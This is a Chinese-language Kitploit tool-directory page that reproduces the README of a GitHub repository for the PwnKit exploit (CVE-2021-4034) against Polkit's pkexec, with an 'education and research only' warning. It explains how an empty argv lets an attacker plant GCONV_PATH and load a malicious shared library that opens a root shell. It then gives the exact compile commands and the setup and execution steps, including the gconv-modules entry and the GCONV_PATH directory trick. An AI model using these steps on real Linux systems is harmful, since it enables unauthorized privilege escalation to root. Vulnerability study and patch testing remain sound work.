Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-4034-PwnKit- — 这个仓库展示了如何利用 CVE-2021-4034 漏洞。 | Kitploit
工具/GitHubGitHub/igonzalez357/cve-2021-4034-pwnkit-
权限提升漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubigonzalez357/cve-2021-4034-pwnkit-

CVE-2021-4034-PwnKit-

这个仓库展示了如何利用 CVE-2021-4034 漏洞。

查看仓库
161年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-4034 (PwnKit) - 分析与利用

此仓库包含演示 CVE-2021-4034 漏洞利用的源代码,该漏洞也被称为 PwnKit,发现于 pkexec(Polkit 包的一部分)。该缺陷允许通过使用恶意环境变量 本地提权至 root。


⚠️ 警告

此代码仅供 教育和研究目的 使用。不得在生产系统上或未经明确授权的情况下使用。滥用可能违法,并违反作者的使用条款。


🧠 技术描述

当 pkexec 在没有参数的情况下执行时(即 argc == 0),该漏洞出现。在这种情况下,pkexec 尝试访问 argv[1] 而不检查 argv[0] 是否存在,导致它读取 envp[0]。这使得攻击者能够:

  • 读取并覆盖环境变量,如 GCONV_PATH。
  • 强制加载任意 .so 库以 root 身份执行代码。

该利用利用此条件加载一个恶意库,以 root 用户身份打开一个 shell。


📁 仓库文件

  • cve-2021-4034.c:利用的源代码,使用 argv[] = {NULL} 和修改后的环境变量调用 pkexec。
  • pwnkit.c:恶意库的源代码,以 root 身份打开一个 shell。

🛠️ 编译

gcc -Wall -o cve-2021-4034 cve-2021-4034.c
gcc -Wall -shared -fPIC -o pwnkit.so pwnkit.c

🧪 使用说明(环境准备与执行)

mkdir GCONV_PATH=.
echo 'module UTF-8// PWNKIT// pwnkit 1' > gconv-modules
cp $(which true) GCONV_PATH=./pwnkit.so:.

./cve-2021-4034
下载工具